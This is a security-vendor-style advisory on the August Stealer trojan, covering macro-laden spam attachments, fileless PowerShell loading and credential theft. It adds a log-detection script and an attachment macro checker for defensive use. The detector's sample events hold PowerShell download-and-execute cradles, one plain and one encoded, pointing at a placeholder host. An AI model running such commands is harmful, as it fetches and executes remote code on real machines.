Danger level 7
Type: Trojans
Common infection symptoms:
  • Slow Computer
  • System crashes
  • Connects to the internet without permission
  • Installs itself without permission
  • Can't be uninstalled via Control Panel

August Stealer Revs Up to Steal Credentials, Crypto-Currency and More

There are many different types of malware, and August Stealer belongs to a category that inexperienced users might find difficult to understand. It is classified as a Trojan because it relies on deception and stealth to get onto targeted systems. Although it could be used against random users, research shows that it is usually aimed at the customer-support and sales staff of large retailers and manufacturers. That, of course, does not mean the infection will behave the same way in every situation, or that it will not evolve. The identity of the creator of this malware is unknown, but the macro-based dropper used to deliver it has been found on sale on the dark web for around 100 USD. That is not a large sum, and many malicious parties are likely to take advantage of it, especially since little effort is needed once it has been bought. If the target is tricked into opening the malicious file and enabling macros, data theft begins right away, and the victim may realize that they need to remove August Stealer only after it has completed its task.

How is August Stealer distributed?

The short answer is via email. Unfortunately, malicious spam emails can be difficult to spot, especially when they are crafted carefully. As mentioned already, the infection is most likely to target the support systems of larger companies, specifically retailers. In the examples analyzed, August Stealer is spread using spam emails that pose as messages from customers, which retailers cannot simply ignore. Subject lines found to be associated with the infection include "Items vanish from the cart before checkout" and "Need help with order." The message body describes a problem the alleged customer is having, and the attached Word document supposedly provides the details. If the target opens the attachment, they are shown a banner asking them to Enable Content, and if they do, the macro runs and August Stealer is installed silently. An attached document that is empty or whose contents make no sense is a red flag that the system should be scanned for malware that might need to be removed. Our research team recommends that users who receive such emails delete them immediately or handle them with caution.

How does August Stealer work once inside?

As the name suggests, the infection was created to steal, and our research team indicates that it goes after all kinds of information: passwords, bitcoin wallet data, personal files, RDP connection files (which could be used to gain unauthorized remote access to the system), messenger login data, and even cookies that store session and other sensitive data. To maximize its haul, August Stealer is built to harvest data from a wide range of applications. These include Microsoft Outlook, Mozilla Thunderbird, Windows Live Mail, FileZilla, CoreFTP, and web browsers. The browsers that can be affected are Amigo, Bromium, Chrome, Chromium, Comodo, CoolNovo, Coowon, Dooble, FireFox, IceDragon, Mail.Ru, Opera, RockMelt, SRWare Iron, Torch, U, Vivaldi, and Yandex. The macro uses PowerShell to download the payload and load it directly into memory rather than writing it to disk (a fileless technique), and the payload itself is a .NET executable protected with the Confuser obfuscator so that it is not detected and removed before it finishes its job. If it remains undetected, it quickly collects the data and transmits it to a remote server, where the operators can unpack it and use it in various ways, for example, to hijack personal accounts with the stolen usernames and passwords, or to steal crypto-currency or funds from online banking accounts.
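The delivery chain described in the two sections above (Word document, Enable Content, macro launches PowerShell, payload pulled straight into memory) leaves a distinctive trace in process-creation telemetry: an Office binary as the parent of a script host, with a download cradle on the command line. The following detection sketch is an added example written for this page; it is not code from the page or from the malware. The log lines are constructed JSON records in the shape of Sysmon Event ID 1 exports (Sysmon field names, invented values), the indicator list is an assumption to be tuned against real telemetry, and `example.invalid` is a placeholder host.

```python
"""Flag Office-spawned script hosts and in-memory download cradles in process logs.

Added example, not the page's own code. Input: JSON lines with Sysmon-style
fields Image, ParentImage, CommandLine. Sample events are CONSTRUCTED.
"""
import base64
import json
import re
from typing import List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments typical of download-and-execute-in-memory cradles.
# Assumed, deliberately short indicator list; extend it from your own telemetry.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloaddata", r"downloadfile",
    r"invoke-webrequest", r"\biwr\b", r"reflection\.assembly", r"frombase64string",
    r"-w(?:indowstyle)?\s+hidden", r"-e(?:p|xecutionpolicy)?\s+bypass", r"-nop(?:rofile)?\b",
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded(command_line: str) -> str:
    """Append the decoded form of a -EncodedCommand argument so indicators hidden
    inside it are visible to the pattern scan; leave other command lines untouched."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return command_line
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line
    return f"{command_line} {decoded}"


def classify(event: dict) -> Tuple[Optional[str], List[str]]:
    """Return (severity, reasons) for one process-creation event.
    high   = Office parent + cradle indicators (the chain described on this page)
    medium = Office parent spawning a script host, no cradle seen
    low    = cradle indicators from a non-Office parent (often admin activity)"""
    reasons: List[str] = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    office_spawn = parent in OFFICE_PARENTS and child in SCRIPT_HOSTS
    if office_spawn:
        reasons.append(f"{parent} spawned {child}")
    text = expand_encoded(event.get("CommandLine", "")).lower()
    cradle = [p for p in CRADLE_PATTERNS if re.search(p, text)]
    reasons.extend(f"cradle pattern {p!r}" for p in cradle)
    if office_spawn and cradle:
        return "high", reasons
    if office_spawn:
        return "medium", reasons
    if cradle:
        return "low", reasons
    return None, reasons


def scan(lines) -> List[Tuple[str, str, List[str]]]:
    """Run classify() over JSON log lines; return (severity, child image, reasons) for hits."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        severity, reasons = classify(event)
        if severity:
            hits.append((severity, basename(event["Image"]), reasons))
    return hits


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# CONSTRUCTED sample: a benign document open, a plaintext cradle from Word,
# an encoded reflective-load cradle from Word, and an admin download from cmd.
SAMPLE_LINES = [json.dumps(e) for e in [
    {"Image": WINWORD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\a\Downloads\order.docm"'},
    {"Image": POWERSHELL, "ParentImage": WINWORD,
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile "
                    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"Image": POWERSHELL, "ParentImage": WINWORD,
     "CommandLine": "powershell.exe -enc " + encode_command(
         "[System.Reflection.Assembly]::Load((New-Object Net.WebClient)"
         ".DownloadData('http://example.invalid/b')).EntryPoint.Invoke($null,$null)")},
    {"Image": POWERSHELL, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -Command Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]]

if __name__ == "__main__":
    for severity, image, reasons in scan(SAMPLE_LINES):
        print(severity, image, "; ".join(reasons))
```

The parent/child relationship is the strong signal: a document viewer has no business starting PowerShell, so the `medium` tier is worth alerting on even when the command line looks clean. Decoding `-EncodedCommand` before matching matters because the obfuscated chains this page describes routinely hide the cradle there, and a PowerShell process launched with a hidden window and a bypassed execution policy from an Office parent is the fileless pattern the text warns about.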

What should you do to stop August Stealer?

First and foremost, August Stealer is not the only infection of this nature. Vega Stealer is a variant of this threat, and it is just as malicious. The point is that you need to look at the bigger picture to ensure that your system is protected from all kinds of malware. Deleting August Stealer can be a challenge because it is a fileless infection that uses obfuscation to stay hidden. Anti-malware software is essential in any case, but it cannot protect against every threat, and the easiest malware to remove is the one that never gets in. Retailers, manufacturers, and regular users therefore need to do everything they can to prevent it from slithering in altogether. In this situation, staying away from corrupted spam emails is the most important task. Since that is not always possible, tools that detect and remove malware before it can do harm must be employed, and email gateway security that inspects attachments before they reach a mailbox is strongly recommended.
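The recommendation above to stop the lure at the email gateway comes down to one concrete check: does the attached Word document carry a VBA project at all? The function below is an added example, not the page's own code, and it uses only the Python standard library. It inspects the OOXML container (the zip behind .docm and .docx files) for a `vbaProject.bin` part or a macro-enabled content type, regardless of what the file extension claims. The sample attachments are constructed in memory; legacy binary `.doc` files use the OLE compound format instead and are only recognized here, not parsed.

```python
"""Decide whether a Word attachment contains a VBA macro project.

Added example for the email-gateway check recommended above; not the page's
own code. Sample documents are CONSTRUCTED in memory with zipfile.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary .doc/.xls container


def inspect_attachment(data: bytes) -> str:
    """Classify raw attachment bytes.
    'macro'      - OOXML container with a VBA project (what the August Stealer lure needs)
    'clean'      - OOXML container without a VBA project
    'legacy-ole' - binary .doc; needs an OLE parser, so treat as unverified
    'not-office' - neither format"""
    if data.startswith(OLE_MAGIC):
        return "legacy-ole"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = {n.lower(): n for n in zf.namelist()}  # case-insensitive lookup
            if "[content_types].xml" not in names:
                return "not-office"
            if any(n.endswith("vbaproject.bin") for n in names):
                return "macro"
            # A macro-enabled document also declares it in the content-types part.
            types = zf.read(names["[content_types].xml"]).decode("utf-8", "replace").lower()
            if "macroenabled" in types or "vbaproject" in types:
                return "macro"
            return "clean"
    except zipfile.BadZipFile:
        return "not-office"


def build_ooxml(with_vba: bool) -> bytes:
    """CONSTRUCTED minimal Word container, optionally carrying a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        content_types = (
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-'
            'officedocument.wordprocessingml.document.main+xml"/>'
        )
        if with_vba:
            content_types += ('<Override PartName="/word/vbaProject.bin" '
                              'ContentType="application/vnd.ms-office.vbaProject"/>')
        content_types += "</Types>"
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00placeholder, not a real VBA stream")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in [("macro doc", build_ooxml(True)), ("plain doc", build_ooxml(False)),
                        ("legacy doc", OLE_MAGIC + b"\x00" * 8), ("text", b"hello")]:
        print(label, "->", inspect_attachment(blob))
```

At a gateway, anything that returns `macro` from an external sender claiming to be a customer deserves quarantine or at least a stripped attachment; `legacy-ole` should be handed to a proper OLE/VBA parser rather than passed through, because the binary format can carry macros just as well.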
